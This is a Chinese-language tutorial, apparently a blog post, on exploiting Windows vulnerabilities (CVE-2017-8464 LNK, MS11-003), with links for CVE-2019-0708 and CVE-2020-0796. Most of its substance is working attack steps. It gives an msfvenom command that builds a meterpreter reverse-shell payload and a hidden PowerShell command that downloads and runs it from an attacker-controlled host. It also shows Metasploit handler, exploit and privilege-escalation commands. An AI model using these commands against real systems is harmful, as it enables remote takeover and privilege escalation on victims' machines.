Windows系统组件漏洞
目录
- 什么是组件
- 1.CVE-2017-8464
- 原理
- 复现
- 环境部署
- 远程监听
- 2.MS11_003 溢出漏洞
- 原理
- 复现
- 下一步提权
- 3.CVE-2019-0708
- 4.CVE-2020-0796(永恒之黑)
- 5.…………………………
什么是组件
组件一般都是系统自带都有的, 如:WINXP
或WIN2000
它本身,就带有非常强大的组件功能。添加组件可以使系统的功能更加强大。
具体方式:
控制面板--添加或删除程序--添加/删除组件
1.CVE-2017-8464
原理
Windows系统使用二进制解析 .LNK文件,当恶意二进制代码被系统识别执行时即可实现远程代码执行,由于是在explorer.exe进程中运行,所以 load 进内存时与当前用户具有相同权限
复现
环境部署
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.0.102 lport=5555 -f psh-reflection>/opt/search.ps1 #生成shell反弹木马mv search.ps1 /var/www/html #木马移动到/var/www/htmlservice apache2 start #启动服务powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.102/search.ps1');test.ps1" #创建快捷件远程加载
远程监听
use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp show options set LHOST 192.168.0.102 set lport 5555 exploit
2.MS11_003 溢出漏洞
原理
溢出漏洞是由于程序中的某个或某些输入函数(使用者输入参数)对所接收数据的边界验证不严密而造成。
根据程序执行中堆栈调用原理,程序对超出边界的部分如果没有经过验证自动去掉,那么超出边界的部分就会覆盖后面的存放程序指针的数据,当执行完上面的代码,程序会自动调用指针所指向地址的命令。
复现
search ms11_003
use exploit/windows/browser/ms11_003_ie_css_import
set payload windows/meterpreter/reverse_tcp
set srvhost
set lhost 192.168.0.102
set uripath 00
Run
sessions
下一步提权
use post/multi/recon/local_exploit_suggester
set LHOST 192.168.0.102
set SESSION 1
Exploit
3.CVE-2019-0708
可参考:
https://blog.csdn.net/yumengzth/article/details/102768945?utm_medium=distribute.pc_relevant.none-task-blog-title-7&spm=1001.2101.3001.4242
4.CVE-2020-0796(永恒之黑)
https://blog.csdn.net/PigLL/article/details/108012981
5.…………………………
Windows系统组件漏洞相关推荐
- Windows系统近年漏洞概况及攻击教程防御
参考:<2018年Windows平台漏洞年度报告> <burpsuite安全工具使用教程> 一.什么是漏洞? 漏洞是在硬软件,协议的具体实现或系统安 ...
- Windows系统漏洞学习总结
Windows系统常见漏洞分析 由于windows NT/2000操作系统的普及率和市场占有率比较高,所以很容易使它成为很多黑客攻击的目标.目前,Windows NT/2000最主要的漏洞有Unico ...
- McAfee Agent漏洞可导致黑客以Windows 系统权限运行代码
聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 McAfee Enterprise(现更名为 Trellix)修复了McAfee Agent 软件 Windows 版中的一个漏洞(CVE-20 ...
- 严重的 BootHole 漏洞影响所有 Linux 发行版和 Windows 系统(详细分析)
聚焦源代码安全,网罗国内外最新资讯! 编译:奇安信代码卫士团队 Eclypsium 公司发现,GRUB2 引导程序 (bootloader) 中存在"BootHole" 漏洞,导 ...
- 微软修复打印机服务漏洞 所有支持Windows系统都受影响
在本月的补丁星期二活动日中,在常规安全公告中涵盖一项Windows Print Spooler组件系统的漏洞,Windows Vista及更高版本都受影响可能会导致某些安全问题. 根据微软安全公告MS ...
- python dos攻击_利用SMB漏洞DoS攻击任何Windows系统
原标题:利用SMB漏洞DoS攻击任何Windows系统 近日微软报出SMB V1存在漏洞,安全研究员并将此漏洞称作 " SMBLoris ",解释其能够发动拒绝服务(Dos)攻击, ...
- Windows系统帮助中心程序的0day漏洞
金山网盾监测到一个新的0day漏洞,这是一个基于Windows系统帮助中心程序的0day漏洞,它是由于帮助中心程序进行格式处理时调用hcp协议的一个错误引起的.***者利用这个漏洞可以在用户的电脑上执 ...
- [网络安全自学篇] 三十四.Windows系统安全缺陷之5次Shift漏洞启动计算机机理分析
这是作者的系列网络安全自学教程,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文详细讲解了绕狗一句话原理.绕过安全狗的常用方法和过狗菜刀,并实践安装安全狗进 ...
- 64位windows系统如何显示32位dcom组件配置
在运行栏中输入命令:dcomcnfg,打开组件服务管理窗口,但是却发现找不到Microsoft Excel程序,这主要是64位系统的问题,excel是32位的组件,所以在正常的系统组件服务里是看不到的 ...
最新文章
- mysql时间复杂度o的n次方_MySQL性能测试调优
- hadoop-0.20.2安装配置
- 【原】docker部署单节点consul
- python写字板_pywinauto简单操作写字板的例子
- MATLAB的Kmeans函数实现聚类
- 【C语言】C语言的数据类型
- 深度学习自学(十五):人脸识别数据预处理方法
- Git和Cmake下载超级慢的解决方案
- 天刀 服务器状态,12月11日服务器例行维护公告(已完成)
- PHP LOL接口,电竞数据API接口|英雄联盟lol|联赛统计|API调用示例代码
- jQWidgets v8.0.0正式发布
- 【con】rounded不起作用(前端bug日记3)
- 微信分享网页链接自定义图片和文字描述
- 解决win7防火墙打不开的问题:错误代码1079和错误代码13
- 视频压缩编码和音频压缩编码基本原理
- 一分钟了解“#include iomanip”
- Kotlin高仿微信-第35篇-支付-二维码收款(二维码)
- Linphone android去电增加自定义SIP消息头的流程分析
- PostgreSQL trigger
- 黄金斗士原生android,联想黄金斗士S8手机怎么样 黄金斗士S8真机评测详细图解
热门文章
- SkeyeRTSPLive高效转码之SkeyeVideoDecoder采用Nvidia独立显卡高效硬件解码解决方案(附源码)
- CREO:CREO软件之工程图【插入页面】、【装配图出工程图】、【将视图转为绘制图元】、【工程图输入到CAD中去修改】的简介及其使用方法(图文教程)之详细攻略
- 最好社区运营,就要积分激励体系
- php sqlite3菜鸟,SQLite 创建数据库 | 菜鸟教程
- t3系统总显示得不到服务器,用友T3不能连接服务器你好,用友T3总是说连接不到服务...
- 【P2303】Longge的问题
- 差分管电路图_差分电路
- 南京信息工程大学本科毕业论文答辩和论文选题PPT模板
- 使用QAxObject将原来的Excel数据转换为PDF
- 张瑞敏:人不成熟的六大特征